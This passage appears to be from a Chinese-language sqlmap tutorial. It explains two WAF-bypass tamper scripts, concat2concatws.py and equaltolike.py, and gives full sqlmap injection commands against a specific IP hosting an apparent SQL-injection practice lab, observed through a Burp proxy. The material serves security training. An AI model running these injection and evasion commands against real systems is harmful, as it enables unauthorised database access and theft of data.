sqlmap从入门到精通-第七章-7-7 绕过WAF脚本-con

14. concat2concatws.py脚本

表示使用concat_ws(mid(char(0),0,0),A,D) 替换为concat(A,D)，只适用于mysql

实战演示：

测试地址：python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="concat2concatws.py" --proxy="http://127.0.0.1:8080" -batch

 发现是可以注入的，使用burp查看抓包的信息，发现并未看到很好的效果

 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

15. equaltolike.py脚本

通过使用like这个运算符替换所有的等于号"=" 适用于所有的数据库

实战演示：

测试地址：python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="equaltolike.py" --proxy="http://127.0.0.1:8080" -batch

 达到效果，可以正常注入，我们查看下burp的抓包数据